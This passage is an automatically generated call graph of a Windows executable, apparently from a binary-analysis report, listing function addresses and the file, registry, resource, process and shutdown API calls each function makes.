2186 7ff7e6e84dcc 24 API calls 2182->2186 2183->2182 2185 7ff7e6e8325a 2183->2185 2184 7ff7e6e8331f 2184->2168 2191 7ff7e6e82318 18 API calls 2184->2191 2198 7ff7e6e83347 2184->2198 2519 7ff7e6e86ca4 GetCurrentDirectoryA SetCurrentDirectoryA 2185->2519 2189 7ff7e6e8322b 2186->2189 2188->2184 2192 7ff7e6e832fb 2188->2192 2195 7ff7e6e832cb 2188->2195 2633 7ff7e6e87700 GetLastError 2189->2633 2191->2198 2546 7ff7e6e85d90 2192->2546 2194 7ff7e6e83368 2194->2168 2202 7ff7e6e83383 2194->2202 2199 7ff7e6e87ac8 28 API calls 2195->2199 2196 7ff7e6e83230 2196->2168 2198->2194 2568 7ff7e6e840c4 2198->2568 2200 7ff7e6e832f6 2199->2200 2200->2168 2634 7ff7e6e8772c 2200->2634 2644 7ff7e6e8494c 2202->2644 2206 7ff7e6e86214 2205->2206 2207 7ff7e6e86273 2206->2207 2208 7ff7e6e8624c LocalFree LocalFree 2206->2208 2209 7ff7e6e86229 SetFileAttributesA DeleteFileA 2206->2209 2211 7ff7e6e86311 2207->2211 2216 7ff7e6e862f4 SetCurrentDirectoryA 2207->2216 2217 7ff7e6e87c40 4 API calls 2207->2217 2208->2206 2209->2208 2210 7ff7e6e86387 2212 7ff7e6e88470 7 API calls 2210->2212 2211->2210 2213 7ff7e6e8632d RegOpenKeyExA 2211->2213 2214 7ff7e6e82ce8 2212->2214 2213->2210 2215 7ff7e6e8635e RegDeleteValueA RegCloseKey 2213->2215 2214->2096 2214->2104 2219 7ff7e6e82318 2214->2219 2215->2210 2218 7ff7e6e8204c 16 API calls 2216->2218 2217->2216 2218->2211 2220 7ff7e6e82447 2219->2220 2221 7ff7e6e82330 2219->2221 2893 7ff7e6e82244 GetWindowsDirectoryA 2220->2893 2222 7ff7e6e823cb RegOpenKeyExA 2221->2222 2223 7ff7e6e8233a 2221->2223 2225 7ff7e6e823fe RegQueryInfoKeyA 2222->2225 2226 7ff7e6e823c3 2222->2226 2223->2226 2227 7ff7e6e8234a RegOpenKeyExA 2223->2227 2228 7ff7e6e823a8 RegCloseKey 2225->2228 2226->2104 2227->2226 2229 7ff7e6e8237d RegQueryValueExA 2227->2229 2228->2226 2229->2228 2231 7ff7e6e84e49 LoadStringA 2230->2231 2244 7ff7e6e85024 2230->2244 2233 7ff7e6e84eb5 2231->2233 2234 7ff7e6e84e73 2231->2234 2232 7ff7e6e88470 7 API calls 2235 7ff7e6e82d59 2232->2235 2237 7ff7e6e84f31 2233->2237 2245 7ff7e6e84ec1 2233->2245 2236 7ff7e6e87f04 13 API calls 2234->2236 2235->2096 2235->2105 2238 7ff7e6e84e78 2236->2238 2237->2237 2241 7ff7e6e84f8e LocalAlloc 2237->2241 2242 7ff7e6e84f44 LocalAlloc 2237->2242 2239 7ff7e6e84e81 MessageBoxA 2238->2239 2240 7ff7e6e87e34 2 API calls 2238->2240 2239->2244 2240->2239 2241->2244 2254 7ff7e6e84f2c 2241->2254 2242->2244 2248 7ff7e6e84f79 2242->2248 2244->2232 2245->2245 2247 7ff7e6e84eeb LocalAlloc 2245->2247 2247->2244 2250 7ff7e6e84f14 2247->2250 2251 7ff7e6e8114c _vsnprintf 2248->2251 2249 7ff7e6e84fbc MessageBeep 2252 7ff7e6e87f04 13 API calls 2249->2252 2253 7ff7e6e8114c _vsnprintf 2250->2253 2251->2254 2255 7ff7e6e84fd3 2252->2255 2253->2254 2254->2249 2256 7ff7e6e84fdc MessageBoxA LocalFree 2255->2256 2258 7ff7e6e87e34 2 API calls 2255->2258 2256->2244 2258->2256 2260 7ff7e6e81c6f LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2259->2260 2262 7ff7e6e81c4c 2259->2262 2261 7ff7e6e81cec ExitWindowsEx 2260->2261 2260->2262 2261->2262 2264 7ff7e6e81c68 2261->2264 2263 7ff7e6e84dcc 24 API calls 2262->2263 2263->2264 2265 7ff7e6e88470 7 API calls 2264->2265 2266 7ff7e6e81d1a 2265->2266 2266->2096 2268 7ff7e6e8509b 2267->2268 2269 7ff7e6e82e43 2267->2269 2268->2269 2270 7ff7e6e850a4 FindResourceA LoadResource LockResource 2268->2270 2269->2118 2269->2119 2270->2269 2271 7ff7e6e850e3 memcpy_s FreeResource 2270->2271 2271->2269 2282 7ff7e6e87566 2272->2282 2297 7ff7e6e870f2 2272->2297 2273 7ff7e6e88470 7 API calls 2274 7ff7e6e82fb1 2273->2274 2274->2118 2274->2136 2275 7ff7e6e8711d CharNextA 2275->2297 2276 7ff7e6e871e7 GetModuleFileNameA 2277 7ff7e6e8721c 2276->2277 2278 7ff7e6e8720f 2276->2278 2277->2282 2364 7ff7e6e87d68 2278->2364 2280 7ff7e6e876f1 2373 7ff7e6e88648 RtlCaptureContext RtlLookupFunctionEntry 2280->2373 2282->2273 2283 7ff7e6e871ca 2283->2276 2283->2282 2285 7ff7e6e87238 CharUpperA 2286 7ff7e6e8766f 2285->2286 2285->2297 2287 7ff7e6e84dcc 24 API calls 2286->2287 2288 7ff7e6e87692 2287->2288 2289 7ff7e6e8769e CloseHandle 2288->2289 2290 7ff7e6e876aa ExitProcess 2288->2290 2289->2290 2291 7ff7e6e8739d CharUpperA 2291->2297 2292 7ff7e6e87ce8 IsDBCSLeadByte CharNextA 2292->2297 2293 7ff7e6e87346 CompareStringA 2293->2297 2294 7ff7e6e873fb CharUpperA 2294->2297 2295 7ff7e6e87492 CharUpperA 2295->2297 2296 7ff7e6e872d0 CharUpperA 2296->2297 2297->2275 2297->2280 2297->2282 2297->2283 2297->2285 2297->2291 2297->2292 2297->2293 2297->2294 2297->2295 2297->2296 2369 7ff7e6e87ba8 2297->2369 2302 7ff7e6e88479 2299->2302 2300 7ff7e6e884d0 RtlCaptureContext RtlLookupFunctionEntry 2303 7ff7e6e88515 RtlVirtualUnwind 2300->2303 2304 7ff7e6e88557 2300->2304 2301 7ff7e6e82cd4 2301->2096 2301->2159 2302->2300 2302->2301 2303->2304 2379 7ff7e6e88494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2304->2379 2308 7ff7e6e82213 2307->2308 2311 7ff7e6e82086 2307->2311 2309 7ff7e6e88470 7 API calls 2308->2309 2310 7ff7e6e82222 2309->2310 2310->2124 2312 7ff7e6e820dc FindFirstFileA 2311->2312 2312->2308 2320 7ff7e6e820fe 2312->2320 2313 7ff7e6e82138 lstrcmpA 2315 7ff7e6e821d9 FindNextFileA 2313->2315 2316 7ff7e6e82158 lstrcmpA 2313->2316 2314 7ff7e6e821a3 2317 7ff7e6e821b4 SetFileAttributesA DeleteFileA 2314->2317 2318 7ff7e6e821f5 FindClose RemoveDirectoryA 2315->2318 2315->2320 2316->2315 2316->2320 2317->2315 2318->2308 2319 7ff7e6e87ba8 CharPrevA 2319->2320 2320->2313 2320->2314 2320->2315 2320->2319 2321 7ff7e6e8204c 8 API calls 2320->2321 2321->2320 2326 7ff7e6e83c59 2322->2326 2329 7ff7e6e83c4f 2322->2329 2323 7ff7e6e84dcc 24 API calls 2336 7ff7e6e83f05 2323->2336 2324 7ff7e6e88470 7 API calls 2325 7ff7e6e83042 2324->2325 2325->2124 2337 7ff7e6e812ec 2325->2337 2328 7ff7e6e83db1 2326->2328 2326->2329 2326->2336 2380 7ff7e6e82834 2326->2380 2328->2329 2330 7ff7e6e83eb7 MessageBeep 2328->2330 2328->2336 2329->2323 2329->2336 2393 7ff7e6e87f04 2330->2393 2333 7ff7e6e83ed3 MessageBoxA 2333->2336 2336->2324 2338 7ff7e6e8133c 2337->2338 2344 7ff7e6e814b5 2337->2344 2427 7ff7e6e811cc LoadLibraryA 2338->2427 2339 7ff7e6e88470 7 API calls 2341 7ff7e6e814da 2339->2341 2341->2124 2356 7ff7e6e87ac8 FindResourceA 2341->2356 2343 7ff7e6e8134d GetCurrentProcess OpenProcessToken 2343->2344 2345 7ff7e6e81377 GetTokenInformation 2343->2345 2344->2339 2346 7ff7e6e814a0 CloseHandle 2345->2346 2347 7ff7e6e813a0 GetLastError 2345->2347 2346->2344 2347->2346 2348 7ff7e6e813b5 LocalAlloc 2347->2348 2348->2346 2349 7ff7e6e813d2 GetTokenInformation 2348->2349 2350 7ff7e6e813fc AllocateAndInitializeSid 2349->2350 2351 7ff7e6e81491 LocalFree 2349->2351 2350->2351 2352 7ff7e6e81445 2350->2352 2351->2346 2353 7ff7e6e81481 FreeSid 2352->2353 2354 7ff7e6e81452 EqualSid 2352->2354 2355 7ff7e6e81476 2352->2355 2353->2351 2354->2352 2354->2355 2355->2353 2357 7ff7e6e87b63 2356->2357 2358 7ff7e6e87b03 LoadResource 2356->2358 2359 7ff7e6e84dcc 24 API calls 2357->2359 2358->2357 2360 7ff7e6e87b1d DialogBoxIndirectParamA FreeResource 2358->2360 2361 7ff7e6e87b82 2359->2361 2360->2357 2362 7ff7e6e87b87 2360->2362 2361->2362 2362->2130 2365 7ff7e6e87dd9 2364->2365 2366 7ff7e6e87d88 2364->2366 2365->2277 2367 7ff7e6e87d90 IsDBCSLeadByte 2366->2367 2368 7ff7e6e87db6 CharNextA 2366->2368 2367->2366 2368->2365 2368->2366 2370 7ff7e6e87bc8 2369->2370 2370->2370 2371 7ff7e6e87bec CharPrevA 2370->2371 2372 7ff7e6e87bda 2370->2372 2371->2372 2372->2297 2374 7ff7e6e88685 RtlVirtualUnwind 2373->2374 2375 7ff7e6e886c7 2373->2375 2374->2375 2378 7ff7e6e88494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2375->2378 2381 7ff7e6e82a2f 2380->2381 2391 7ff7e6e82872 2380->2391 2383 7ff7e6e82a41 GlobalFree 2381->2383 2384 7ff7e6e82a50 2381->2384 2383->2384 2384->2328 2385 7ff7e6e828a5 GetFileVersionInfoSizeA 2386 7ff7e6e828c2 GlobalAlloc 2385->2386 2385->2391 2386->2381 2387 7ff7e6e828e1 GlobalLock 2386->2387 2387->2381 2388 7ff7e6e828fc GetFileVersionInfoA 2387->2388 2389 7ff7e6e82920 VerQueryValueA 2388->2389 2388->2391 2390 7ff7e6e829ed GlobalUnlock 2389->2390 2389->2391 2390->2391 2391->2381 2391->2385 2391->2390 2392 7ff7e6e829d9 GlobalUnlock 2391->2392 2408 7ff7e6e8261c 2391->2408 2392->2381 2394 7ff7e6e87f44 GetVersionExA 2393->2394 2396 7ff7e6e88076 2393->2396 2395 7ff7e6e87f6d 2394->2395 2394->2396 2395->2396 2399 7ff7e6e87f90 GetSystemMetrics 2395->2399 2397 7ff7e6e88470 7 API calls 2396->2397 2398 7ff7e6e83eca 2397->2398 2398->2333 2404 7ff7e6e87e34 2398->2404 2399->2396 2400 7ff7e6e87fa7 RegOpenKeyExA 2399->2400 2400->2396 2401 7ff7e6e87fdc RegQueryValueExA RegCloseKey 2400->2401 2401->2396 2403 7ff7e6e88026 2401->2403 2402 7ff7e6e88065 CharNextA 2402->2403 2403->2396 2403->2402 2405 7ff7e6e87e5a EnumResourceLanguagesA 2404->2405 2407 7ff7e6e87edd 2404->2407 2406 7ff7e6e87e9f EnumResourceLanguagesA 2405->2406 2405->2407 2406->2407 2407->2333 2409 7ff7e6e8265b CharUpperA CharNextA CharNextA 2408->2409 2410 7ff7e6e827e0 GetSystemDirectoryA 2408->2410 2411 7ff7e6e827dd 2409->2411 2412 7ff7e6e8269c 2409->2412 2413 7ff7e6e827f1 2410->2413 2411->2410 2414 7ff7e6e827c7 GetWindowsDirectoryA 2412->2414 2415 7ff7e6e826a6 2412->2415 2416 7ff7e6e82805 2413->2416 2417 7ff7e6e87ba8 CharPrevA 2413->2417 2414->2413 2420 7ff7e6e87ba8 CharPrevA 2415->2420 2418 7ff7e6e88470 7 API calls 2416->2418 2417->2416 2419 7ff7e6e82814 2418->2419 2419->2391 2421 7ff7e6e82705 RegOpenKeyExA 2420->2421 2421->2413 2422 7ff7e6e82738 RegQueryValueExA 2421->2422 2423 7ff7e6e8276b 2422->2423 2424 7ff7e6e827b4 RegCloseKey 2422->2424 2425 7ff7e6e82774 ExpandEnvironmentStringsA 2423->2425 2426 7ff7e6e82792 2423->2426 2424->2413 2425->2426 2426->2424 2428 7ff7e6e812bb 2427->2428 2429 7ff7e6e81221 GetProcAddress 2427->2429 2432 7ff7e6e88470 7 API calls 2428->2432 2430 7ff7e6e812ac FreeLibrary 2429->2430 2431 7ff7e6e8123f AllocateAndInitializeSid 2429->2431 2430->2428 2431->2430 2434 7ff7e6e81288 FreeSid 2431->2434 2433 7ff7e6e812ca 2432->2433 2433->2343 2433->2344 2434->2430 2437 7ff7e6e85050 7 API calls 2436->2437 2438 7ff7e6e860bf LocalAlloc 2437->2438 2439 7ff7e6e860dd 2438->2439 2440 7ff7e6e8610b 2438->2440 2442 7ff7e6e84dcc 24 API calls 2439->2442 2441 7ff7e6e85050 7 API calls 2440->2441 2443 7ff7e6e8611d 2441->2443 2444 7ff7e6e860fb 2442->2444 2445 7ff7e6e8615a lstrcmpA 2443->2445 2446 7ff7e6e86121 2443->2446 2657 7ff7e6e87700 GetLastError 2444->2657 2449 7ff7e6e8618a 2445->2449 2450 7ff7e6e86174 LocalFree 2445->2450 2448 7ff7e6e84dcc 24 API calls 2446->2448 2452 7ff7e6e8613f LocalFree 2448->2452 2453 7ff7e6e84dcc 24 API calls 2449->2453 2451 7ff7e6e83123 2450->2451 2451->2161 2451->2163 2451->2168 2452->2451 2454 7ff7e6e861ac LocalFree 2453->2454 2455 7ff7e6e86100 2454->2455 2455->2451 2457 7ff7e6e85050 7 API calls 2456->2457 2458 7ff7e6e86001 2457->2458 2459 7ff7e6e86006 2458->2459 2460 7ff7e6e8604a 2458->2460 2462 7ff7e6e84dcc 24 API calls 2459->2462 2461 7ff7e6e85050 7 API calls 2460->2461 2463 7ff7e6e86063 2461->2463 2464 7ff7e6e86025 2462->2464 2465 7ff7e6e8772c 13 API calls 2463->2465 2466 7ff7e6e83146 2464->2466 2467 7ff7e6e8606f 2465->2467 2466->2168 2470 7ff7e6e866c4 2466->2470 2467->2466 2468 7ff7e6e86073 2467->2468 2469 7ff7e6e84dcc 24 API calls 2468->2469 2469->2464 2471 7ff7e6e85050 7 API calls 2470->2471 2472 7ff7e6e86706 LocalAlloc 2471->2472 2473 7ff7e6e86756 2472->2473 2474 7ff7e6e86726 2472->2474 2476 7ff7e6e85050 7 API calls 2473->2476 2475 7ff7e6e84dcc 24 API calls 2474->2475 2477 7ff7e6e86744 2475->2477 2478 7ff7e6e86768 2476->2478 2682 7ff7e6e87700 GetLastError 2477->2682 2480 7ff7e6e8676c 2478->2480 2481 7ff7e6e867a5 lstrcmpA LocalFree 2478->2481 2485 7ff7e6e84dcc 24 API calls 2480->2485 2482 7ff7e6e867ec 2481->2482 2483 7ff7e6e86837 2481->2483 2491 7ff7e6e864e4 53 API calls 2482->2491 2487 7ff7e6e86b14 2483->2487 2490 7ff7e6e8684f GetTempPathA 2483->2490 2484 7ff7e6e86749 2486 7ff7e6e8674f 2484->2486 2488 7ff7e6e8678a LocalFree 2485->2488 2492 7ff7e6e88470 7 API calls 2486->2492 2489 7ff7e6e87ac8 28 API calls 2487->2489 2488->2486 2489->2486 2493 7ff7e6e86872 2490->2493 2500 7ff7e6e868a5 2490->2500 2494 7ff7e6e8680c 2491->2494 2495 7ff7e6e83153 2492->2495 2658 7ff7e6e864e4 2493->2658 2494->2486 2497 7ff7e6e86814 2494->2497 2495->2168 2495->2173 2499 7ff7e6e84dcc 24 API calls 2497->2499 2499->2484 2500->2486 2502 7ff7e6e86adb GetWindowsDirectoryA 2500->2502 2503 7ff7e6e868f9 GetDriveTypeA 2500->2503 2505 7ff7e6e86ca4 38 API calls 2502->2505 2506 7ff7e6e86916 GetFileAttributesA 2503->2506 2517 7ff7e6e86911 2503->2517 2505->2500 2506->2517 2507 7ff7e6e864e4 53 API calls 2507->2500 2508 7ff7e6e86ca4 38 API calls 2508->2517 2509 7ff7e6e86955 GetDiskFreeSpaceA 2510 7ff7e6e86983 MulDiv 2509->2510 2509->2517 2510->2517 2511 7ff7e6e82468 25 API calls 2511->2517 2512 7ff7e6e86a02 GetWindowsDirectoryA 2512->2517 2513 7ff7e6e87ba8 CharPrevA 2514 7ff7e6e86a2a GetFileAttributesA 2513->2514 2515 7ff7e6e86a40 CreateDirectoryA 2514->2515 2514->2517 2515->2517 2516 7ff7e6e86a6d SetFileAttributesA 2516->2517 2517->2486 2517->2502 2517->2503 2517->2506 2517->2508 2517->2509 2517->2511 2517->2512 2517->2513 2517->2516 2518 7ff7e6e864e4 53 API calls 2517->2518 2518->2517 2520 7ff7e6e86d12 2519->2520 2521 7ff7e6e86d3f GetDiskFreeSpaceA 2519->2521 2524 7ff7e6e84dcc 24 API calls 2520->2524 2522 7ff7e6e86f63 memset 2521->2522 2523 7ff7e6e86d80 MulDiv 2521->2523 2736 7ff7e6e87700 GetLastError 2522->2736 2523->2522 2526 7ff7e6e86dae GetVolumeInformationA 2523->2526 2527 7ff7e6e86d2f 2524->2527 2529 7ff7e6e86de6 memset 2526->2529 2530 7ff7e6e86e45 SetCurrentDirectoryA 2526->2530 2717 7ff7e6e87700 GetLastError 2527->2717 2528 7ff7e6e86f7b GetLastError FormatMessageA 2532 7ff7e6e86fbd 2528->2532 2718 7ff7e6e87700 GetLastError 2529->2718 2540 7ff7e6e86e6c 2530->2540 2536 7ff7e6e84dcc 24 API calls 2532->2536 2534 7ff7e6e86d34 2535 7ff7e6e86f41 2534->2535 2539 7ff7e6e88470 7 API calls 2535->2539 2538 7ff7e6e86fd8 SetCurrentDirectoryA 2536->2538 2537 7ff7e6e86dfe GetLastError FormatMessageA 2537->2532 2538->2535 2541 7ff7e6e8326f 2539->2541 2542 7ff7e6e86eb4 2540->2542 2544 7ff7e6e86ed8 2540->2544 2541->2168 2541->2181 2543 7ff7e6e84dcc 24 API calls 2542->2543 2543->2534 2544->2535 2719 7ff7e6e824f8 2544->2719 2547 7ff7e6e85050 7 API calls 2546->2547 2548 7ff7e6e85dab FindResourceA LoadResource LockResource 2547->2548 2549 7ff7e6e85dfc 2548->2549 2565 7ff7e6e85fcf 2548->2565 2550 7ff7e6e85e08 GetDlgItem ShowWindow GetDlgItem ShowWindow 2549->2550 2551 7ff7e6e85e56 2549->2551 2550->2551 2737 7ff7e6e85c60 #20 2551->2737 2554 7ff7e6e85e69 #20 2555 7ff7e6e85e5f 2554->2555 2556 7ff7e6e85ed1 #22 2554->2556 2559 7ff7e6e84dcc 24 API calls 2555->2559 2557 7ff7e6e85f55 2556->2557 2558 7ff7e6e85f15 #23 2556->2558 2561 7ff7e6e85f75 2557->2561 2562 7ff7e6e85f61 FreeResource 2557->2562 2558->2555 2558->2557 2560 7ff7e6e85f53 2559->2560 2560->2557 2563 7ff7e6e85f9f 2561->2563 2564 7ff7e6e85f81 2561->2564 2562->2561 2563->2565 2567 7ff7e6e85fb1 SendMessageA 2563->2567 2566 7ff7e6e84dcc 24 API calls 2564->2566 2565->2200 2566->2563 2567->2565 2569 7ff7e6e84118 2568->2569 2592 7ff7e6e8412f 2568->2592 2570 7ff7e6e85050 7 API calls 2569->2570 2570->2592 2571 7ff7e6e84145 memset 2571->2592 2572 7ff7e6e84254 2573 7ff7e6e84dcc 24 API calls 2572->2573 2574 7ff7e6e84273 2573->2574 2575 7ff7e6e844ee 2574->2575 2578 7ff7e6e88470 7 API calls 2575->2578 2576 7ff7e6e85050 7 API calls 2576->2592 2579 7ff7e6e844ff 2578->2579 2579->2194 2580 7ff7e6e845d8 2580->2575 2582 7ff7e6e845f2 RegOpenKeyExA 2580->2582 2581 7ff7e6e842f5 CompareStringA 2581->2580 2581->2592 2582->2575 2586 7ff7e6e84627 RegQueryValueExA 2582->2586 2583 7ff7e6e84599 2585 7ff7e6e84dcc 24 API calls 2583->2585 2584 7ff7e6e844df LocalFree 2584->2575 2588 7ff7e6e845b8 LocalFree 2585->2588 2590 7ff7e6e8471c RegCloseKey 2586->2590 2591 7ff7e6e8466c memset GetSystemDirectoryA 2586->2591 2588->2575 2590->2575 2593 7ff7e6e8469d 2591->2593 2594 7ff7e6e846b3 2591->2594 2592->2571 2592->2572 2592->2575 2592->2576 2592->2580 2592->2581 2592->2583 2592->2584 2595 7ff7e6e841fd CompareStringA 2592->2595 2597 7ff7e6e844ad LocalFree 2592->2597 2611 7ff7e6e84394 2592->2611 2764 7ff7e6e81684 2592->2764 2803 7ff7e6e81d28 memset memset RegCreateKeyExA 2592->2803 2830 7ff7e6e8473c CreateProcessA 2592->2830 2598 7ff7e6e87ba8 CharPrevA 2593->2598 2599 7ff7e6e8114c _vsnprintf 2594->2599 2595->2592 2597->2580 2597->2592 2598->2594 2600 7ff7e6e846dc RegSetValueExA 2599->2600 2600->2590 2601 7ff7e6e843a5 GetProcAddress 2603 7ff7e6e84521 2601->2603 2601->2611 2602 7ff7e6e84574 2604 7ff7e6e84dcc 24 API calls 2602->2604 2605 7ff7e6e84dcc 24 API calls 2603->2605 2607 7ff7e6e84597 2604->2607 2608 7ff7e6e84544 FreeLibrary 2605->2608 2609 7ff7e6e84553 LocalFree 2607->2609 2608->2609 2855 7ff7e6e87700 GetLastError 2609->2855 2611->2601 2611->2602 2612 7ff7e6e844d3 FreeLibrary 2611->2612 2613 7ff7e6e84480 FreeLibrary 2611->2613 2845 7ff7e6e879f0 2611->2845 2612->2584 2613->2597 2615 7ff7e6e85050 7 API calls 2614->2615 2616 7ff7e6e83f8b LocalAlloc 2615->2616 2617 7ff7e6e83fdd 2616->2617 2618 7ff7e6e83fad 2616->2618 2620 7ff7e6e85050 7 API calls 2617->2620 2619 7ff7e6e84dcc 24 API calls 2618->2619 2621 7ff7e6e83fcb 2619->2621 2622 7ff7e6e83fef 2620->2622 2892 7ff7e6e87700 GetLastError 2621->2892 2624 7ff7e6e83ff3 2622->2624 2625 7ff7e6e84030 lstrcmpA 2622->2625 2626 7ff7e6e84dcc 24 API calls 2624->2626 2627 7ff7e6e8404e 2625->2627 2628 7ff7e6e84098 LocalFree 2625->2628 2629 7ff7e6e84011 LocalFree 2626->2629 2630 7ff7e6e87ac8 28 API calls 2627->2630 2631 7ff7e6e83139 2628->2631 2629->2631 2632 7ff7e6e8406e LocalFree 2630->2632 2631->2161 2631->2168 2632->2631 2633->2196 2635 7ff7e6e8778a 2634->2635 2636 7ff7e6e8114c _vsnprintf 2635->2636 2642 7ff7e6e877b8 FreeResource 2635->2642 2643 7ff7e6e87803 FreeResource 2635->2643 2637 7ff7e6e877df FindResourceA 2636->2637 2638 7ff7e6e8775e LoadResource LockResource 2637->2638 2639 7ff7e6e87801 2637->2639 2638->2635 2638->2639 2640 7ff7e6e88470 7 API calls 2639->2640 2641 7ff7e6e8782e 2640->2641 2641->2184 2642->2635 2643->2639 2645 7ff7e6e85050 7 API calls 2644->2645 2646 7ff7e6e84967 LocalAlloc 2645->2646 2647 7ff7e6e849a9 2646->2647 2648 7ff7e6e84989 2646->2648 2649 7ff7e6e85050 7 API calls 2647->2649 2650 7ff7e6e84dcc 24 API calls 2648->2650 2651 7ff7e6e849bb 2649->2651 2652 7ff7e6e849a7 2650->2652 2653 7ff7e6e849d5 lstrcmpA 2651->2653 2654 7ff7e6e849bf 2651->2654 2652->2168 2653->2654 2655 7ff7e6e84a0e LocalFree 2653->2655 2656 7ff7e6e84dcc 24 API calls 2654->2656 2655->2652 2656->2655 2657->2455 2659 7ff7e6e86516 2658->2659 2661 7ff7e6e865dd 2658->2661 2689 7ff7e6e863b8 2659->2689 2700 7ff7e6e86b70 2661->2700 2662 7ff7e6e86688 2664 7ff7e6e88470 7 API calls 2662->2664 2669 7ff7e6e866a8 2664->2669 2667 7ff7e6e865cc 2674 7ff7e6e87ba8 CharPrevA 2667->2674 2668 7ff7e6e86577 GetSystemInfo 2676 7ff7e6e86591 2668->2676 2669->2486 2683 7ff7e6e82468 GetWindowsDirectoryA 2669->2683 2670 7ff7e6e8662a CreateDirectoryA 2672 7ff7e6e8667d 2670->2672 2673 7ff7e6e8663f 2670->2673 2671 7ff7e6e86649 2671->2662 2677 7ff7e6e86ca4 38 API calls 2671->2677 2712 7ff7e6e87700 GetLastError 2672->2712 2673->2671 2674->2661 2676->2667 2679 7ff7e6e87ba8 CharPrevA 2676->2679 2680 7ff7e6e8665a 2677->2680 2678 7ff7e6e86682 2678->2662 2679->2667 2680->2662 2681 7ff7e6e86666 RemoveDirectoryA 2680->2681 2681->2662 2682->2484 2684 7ff7e6e824a6 2683->2684 2685 7ff7e6e824c4 2683->2685 2686 7ff7e6e84dcc 24 API calls 2684->2686 2687 7ff7e6e88470 7 API calls 2685->2687 2686->2685 2688 7ff7e6e824df 2687->2688 2688->2500 2688->2507 2691 7ff7e6e863e3 2689->2691 2692 7ff7e6e87ba8 CharPrevA 2691->2692 2695 7ff7e6e8644b GetTempFileNameA 2691->2695 2713 7ff7e6e8114c 2691->2713 2693 7ff7e6e86420 RemoveDirectoryA GetFileAttributesA 2692->2693 2693->2691 2694 7ff7e6e864b6 CreateDirectoryA 2693->2694 2694->2695 2696 7ff7e6e86490 2694->2696 2695->2696 2697 7ff7e6e8646b DeleteFileA CreateDirectoryA 2695->2697 2698 7ff7e6e88470 7 API calls 2696->2698 2697->2696 2699 7ff7e6e864a2 2698->2699 2699->2662 2699->2667 2699->2668 2701 7ff7e6e86b8b 2700->2701 2701->2701 2702 7ff7e6e86b94 LocalAlloc 2701->2702 2703 7ff7e6e86bf5 2702->2703 2704 7ff7e6e86bb4 2702->2704 2708 7ff7e6e87ba8 CharPrevA 2703->2708 2705 7ff7e6e84dcc 24 API calls 2704->2705 2706 7ff7e6e86bd2 2705->2706 2709 7ff7e6e86626 2706->2709 2716 7ff7e6e87700 GetLastError 2706->2716 2710 7ff7e6e86c14 CreateFileA LocalFree 2708->2710 2709->2670 2709->2671 2710->2706 2711 7ff7e6e86c61 CloseHandle GetFileAttributesA 2710->2711 2711->2706 2712->2678 2714 7ff7e6e81178 _vsnprintf 2713->2714 2715 7ff7e6e81199 2713->2715 2714->2715 2715->2691 2716->2709 2717->2534 2718->2537 2720 7ff7e6e82525 2719->2720 2721 7ff7e6e82562 2719->2721 2724 7ff7e6e8114c _vsnprintf 2720->2724 2722 7ff7e6e825ab 2721->2722 2723 7ff7e6e82567 2721->2723 2726 7ff7e6e8255d 2722->2726 2729 7ff7e6e8114c _vsnprintf 2722->2729 2725 7ff7e6e8114c _vsnprintf 2723->2725 2727 7ff7e6e8253d 2724->2727 2728 7ff7e6e8257f 2725->2728 2730 7ff7e6e88470 7 API calls 2726->2730 2731 7ff7e6e84dcc 24 API calls 2727->2731 2732 7ff7e6e84dcc 24 API calls 2728->2732 2733 7ff7e6e825c7 2729->2733 2734 7ff7e6e82609 2730->2734 2731->2726 2732->2726 2735 7ff7e6e84dcc 24 API calls 2733->2735 2734->2535 2735->2726 2736->2528 2738 7ff7e6e85ced 2737->2738 2748 7ff7e6e85d62 2737->2748 2749 7ff7e6e85380 2738->2749 2741 7ff7e6e88470 7 API calls 2743 7ff7e6e85d78 2741->2743 2742 7ff7e6e85d0d #21 2744 7ff7e6e85d28 2742->2744 2742->2748 2743->2554 2743->2555 2744->2748 2761 7ff7e6e85770 2744->2761 2747 7ff7e6e85d4f #23 2747->2748 2748->2741 2750 7ff7e6e853b3 2749->2750 2751 7ff7e6e853fd lstrcmpA 2750->2751 2752 7ff7e6e853d0 2750->2752 2754 7ff7e6e853f4 2751->2754 2755 7ff7e6e85454 2751->2755 2753 7ff7e6e84dcc 24 API calls 2752->2753 2753->2754 2754->2742 2754->2748 2755->2754 2756 7ff7e6e854a8 CreateFileA 2755->2756 2756->2754 2758 7ff7e6e854de 2756->2758 2757 7ff7e6e85561 CreateFileA 2757->2754 2758->2754 2758->2757 2759 7ff7e6e85549 CharNextA 2758->2759 2760 7ff7e6e85532 CreateDirectoryA 2758->2760 2759->2758 2760->2759 2762 7ff7e6e857a4 CloseHandle 2761->2762 2763 7ff7e6e8578f 2761->2763 2762->2763 2763->2747 2763->2748 2765 7ff7e6e816d3 2764->2765 2856 7ff7e6e815e8 2765->2856 2768 7ff7e6e87ba8 CharPrevA 2770 7ff7e6e81766 2768->2770 2769 7ff7e6e87d68 2 API calls 2771 7ff7e6e81811 2769->2771 2770->2769 2772 7ff7e6e81a1b 2771->2772 2773 7ff7e6e8181a CompareStringA 2771->2773 2775 7ff7e6e87d68 2 API calls 2772->2775 2773->2772 2774 7ff7e6e8184d GetFileAttributesA 2773->2774 2776 7ff7e6e81867 2774->2776 2777 7ff7e6e819f3 2774->2777 2778 7ff7e6e81a28 2775->2778 2776->2777 2781 7ff7e6e815e8 2 API calls 2776->2781 2782 7ff7e6e84dcc 24 API calls 2777->2782 2779 7ff7e6e81acb LocalAlloc 2778->2779 2780 7ff7e6e81a31 CompareStringA 2778->2780 2779->2777 2783 7ff7e6e81aeb GetFileAttributesA 2779->2783 2780->2779 2790 7ff7e6e81a60 2780->2790 2784 7ff7e6e8188b 2781->2784 2801 7ff7e6e8194f 2782->2801 2785 7ff7e6e81b01 2783->2785 2786 7ff7e6e818b5 LocalAlloc 2784->2786 2787 7ff7e6e815e8 2 API calls 2784->2787 2802 7ff7e6e81b54 2785->2802 2786->2777 2788 7ff7e6e818d7 GetPrivateProfileIntA GetPrivateProfileStringA 2786->2788 2787->2786 2792 7ff7e6e81984 2788->2792 2788->2801 2789 7ff7e6e88470 7 API calls 2793 7ff7e6e81be9 2789->2793 2790->2790 2791 7ff7e6e81a81 LocalAlloc 2790->2791 2791->2777 2794 7ff7e6e81ab2 2791->2794 2796 7ff7e6e819ba 2792->2796 2797 7ff7e6e81995 GetShortPathNameA 2792->2797 